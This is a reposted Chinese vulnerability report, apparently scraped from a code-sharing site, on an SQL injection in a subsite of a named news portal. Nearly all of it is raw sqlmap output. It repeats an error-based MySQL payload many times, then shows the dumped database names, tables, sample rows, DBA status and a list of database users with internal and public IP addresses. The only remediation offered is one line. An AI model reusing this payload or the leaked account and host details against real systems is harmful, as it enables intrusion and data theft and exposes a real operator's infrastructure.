callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />current user is DBA: 'True'<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: apphistory_news<br />[5 tables]<br />+-------------+<br />| figure |<br />| hot_tag |<br />| relate_news |<br />| relate_pic|<br />| stats |<br />+-------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_weather<br />[5 tables]<br />+-------------+<br />| abroad |<br />| airport |<br />| internal |<br />| nephogram |<br />| relate_news |<br />+-------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_news<br />[23 tables]<br />+-----------------------------+<br />| hash |<br />| hdphoto |<br />| ip_test |<br />| lianghui_2010 |<br />| lianghui_2010_copy_20100226 |<br />| lianghui_2010_lhyl |<br />| lianghui_2012 |<br />| lianghui_2012_lhyl |<br />| special_diqiuyixiaoshi2010|<br />| special_martyr |<br />| special_qinghaiyushudizhen|<br />| special_xinanhanzai |<br />| timeline |<br />| tw_vote |<br />| upload |<br />| upload_20121116 |<br />| upload_v |<br />| user_test |<br />| vote_category |<br />| vote_detail |<br />| weather_yb |<br />| weather_yb_tomorrow |<br />| weather_zh |<br />+-<mark style="color:transparent">本文来源gaodaimacom搞#^代%!码网@</mark>----------------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_news<br />Table: user_test<br />[2 entries]<br />+----+--------------+------+---------+-------------+---------------------+<br />| id | ip | lock | intro | username | rec_time |<br />+----+--------------+------+---------+-------------+---------------------+<br />| 1| 220.181.24.2 | | | wangyun1127 | 2010-05-10 14:27:06 |<br />| 2| 220.181.24.2 | | c100 | c100 | 0000-00-00 00:00:00 |<br />+----+--------------+------+---------+-------------+---------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_news<br />Table: hash<br />[10 entries]<br />+----+--------------+--------+<br />| id | name | value|<br />+----+--------------+--------+<br />| 1| ygdx_gd | 258 |<br />| 2| ygdx_bsd | 306 |<br />| 3| ygdx_zmd | 57 |<br />| 4| ygdx_time | 5月8日 |<br />| 5| wudu2010_hlb | 198864 |<br />| 6| wudu2010_szc | 150782 |<br />| 7| wudu2010_wyc | 0 |<br />| 8| wudu2010_xsh | 0 |<br />| 9| wudu2010_wwm | 0 |<br />| 10 | wudu2010_zll | 358715 |<br />+----+--------------+--------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_news<br />Table: lianghui_2012<br />[10 entries]<br />+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br />| id | type | title | verify | delete | cai_num | content | ding_num | user_name | user_type | click_num | debate_num | submit_time |<br />+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br />| 1| 1 | 1 | 1 | | 2 | 1 | 3 | kuaibo_10501 | 1 | 7 | 0 | 2012-02-28 17:44:30 |<br />| 2| 1 | 11 | 1 | | 0 | 1 | 1 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:47 |<br />| 3| 1 | 2 | 1 | | 0 | 2 | 1 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:54 |<br />| 4| 1 | 3 | 1 | | 0 | 3 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:59 |<br />| 5| 1 | 4 | 1 | | 0 | 4 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:47:05 |<br />| 6| 1 | 5 | 1 | | 1 | 5 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:47:09 |<br />| 7| 1 | 5 | 1 | | 1 | 5 | 20 | kuaibo_10501 | 1 | 97 | 0 | 2012-02-29 15:47:17 |<br />| 8| 1 | 6 | 1 | | 0 | 6 | 5 | kuaibo_10501 | 1 | 107 | 0 | 2012-02-29 15:47:22 |<br />| 9| 1 | 7 | 1 | | 0 | 7 | 91 | kuaibo_10501 | 1 | 235 | 0 | 2012-02-29 15:47:26 |<br />| 10 | 1 | 8 | 1 | | 2 | 8 | 2 | kuaibo_10501 | 1 | 97 | 0 | 2012-02-29 15:47:31 |<br />+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />available databases [11]:<br />[*] app_bbs<br />[*] app_news<br />[*] app_weather<br />[*] apphistory_news<br />[*] appmil_news<br />[*] appsports_news<br />[*] baike_health<br />[*] baike_house<br />[*] information_schema<br />[*] mysql<br />[*] test<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />current user is DBA: 'True'<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />database management system users [234]:<br />[*] ''@'localhost'<br />[*] 'B74wNuTbbx'@'10.11.2.89'<br />[*] 'B74wNuTbbx'@'10.11.2.90'<br />[*] 'B74wNuTbbx'@'10.13.2.134'<br />[*] 'B74wNuTbbx'@'10.13.2.135'<br />[*] 'B74wNuTbbx'@'10.13.2.176'<br />[*] 'B74wNuTbbx'@'10.13.2.177'<br />[*] 'B74wNuTbbx'@'220.181.67.192'<br />[*] 'iadmin'@'211.151.61.77'<br />[*] 'root'@'10.13.2.132'<br />[*] 'root'@'10.13.2.134'<br />[*] 'root'@'10.13.2.135'<br />[*] 'root'@'10.13.2.176'<br />[*] 'root'@'10.13.2.177'<br />[*] 'root'@'127.0.0.1'<br />[*] 'root'@'192.168.2.162'<br />[*] 'root'@'192.168.2.167'<br />[*] 'root'@'220.181.24.100'<br />[*] 'root'@'220.181.24.166'<br />[*] 'root'@'220.181.24.2'<br />[*] 'root'@'220.181.67.192'<br />[*] 'root'@'localhost'<br />[*] 'zabbix'@'127.0.0.1'</code>
修复方案:
还是防注入吧
搞代码网(gaodaima.com)提供的所有资源部分来自互联网,如果有侵犯您的版权或其他权益,请说明详细缘由并提供版权或权益证明然后发送到邮箱[email protected],我们会在看到邮件的第一时间内为您处理,或直接联系QQ:872152909。本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:凤凰网分站SQL注入漏洞_MySQL
转载请注明原文链接:凤凰网分站SQL注入漏洞_MySQL
